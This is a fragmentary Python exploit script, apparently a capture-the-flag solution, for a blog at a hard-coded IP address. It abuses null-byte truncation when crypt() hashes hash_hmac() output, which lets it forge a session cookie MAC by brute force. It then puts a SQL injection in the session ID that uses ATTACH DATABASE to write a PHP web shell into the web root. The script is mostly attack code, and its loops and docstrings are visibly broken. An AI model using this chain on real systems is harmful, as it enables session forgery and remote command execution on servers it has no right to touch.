URL = "http://65.108.176.96:8888/"
Find an instance where two IDs produce '\x00' at the beginning of the hash_hmac() output,
resulting in crypt(), which is a non binary safe function, returning the same value.
Returns the MAC that corresponds to this result.
cookie = r.headers['Set-Cookie'].split('=')[1]
cookie = urllib.parse.unquote(cookie)
id, mac = cookie.split('|')
def find_exploit_collision(exploit, mac):
Finds a collision with the exploit user ID string. Appends stuff to the back of the string until
the hash_hmac() output begins with '\x00'.
exploit = urllib.parse.quote_plus(exploit).replace('+', ' ')
# Test if the hash_hmac() output begins with '\x00' (if it does, then the MAC is valid)
r = requests.get(URL, cookies={'session': tmp + '|' + mac})
if "My shitty Blog" in r.text:
mac = "QAhL.MoHxwRM3Bt/pMvSrjxnRCAxaim7VAtMVwCnNgsjtlWO3AKBcd1WY9NYPrxtUrTluTorPK4laJKcJydWB0"
print(f"Found MAC: {mac}")
exploit = find_exploit_collision("20 or 1=1; ATTACH DATABASE '/var/www/html/data/nice.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('<?php system($_GET[\"cmd\"]); ?>');#", mac)
print(f"Found exploit: {exploit}")
print(f"Set session cookie: {exploit}|{mac}")